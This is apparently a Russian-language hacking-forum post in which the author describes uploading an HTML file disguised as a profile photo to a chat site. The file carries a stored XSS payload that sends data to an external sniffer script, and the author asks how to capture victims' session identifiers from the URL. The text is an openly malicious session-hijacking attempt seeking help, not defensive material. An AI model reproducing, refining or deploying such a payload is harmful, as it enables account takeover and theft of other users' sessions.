Может кто-нить подскажет, что я неправильно делаю?

Загрузил я в анкету вместо фотки следующий код
<html>
<head>
......
</head>
<body>
<tr><td><img src="http://chat/photos/26.jpg"><img src=javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?zz_...gt;</tr>
</body>
</html>

Соответственно, при просмотре анкеты пользователя, на вместо фото ничего не показывается - стоит крестик, мол фото не загружено, но при прямом обращении к фото
http://chat/photos/113.jpg идет показ фото из другой анкеты 26.jpg, ну и исполняется ява-скрипт.

Но вот в поле снифера видно только следующее
REFERER=http://chat/photos/113.jpg
QUERY=zz_http://chat/photos/113.jpg
хотя саму ссылку я давал в окне чата... за обработку ссылок в чате отвечает РНР - http://chat/go.php?url=http://chat/photos/113.jpg

PS. opener.location у меня не работает.

Каким образом можно перехватить УРЛ, т.к. в нем как раз и содержится сессия?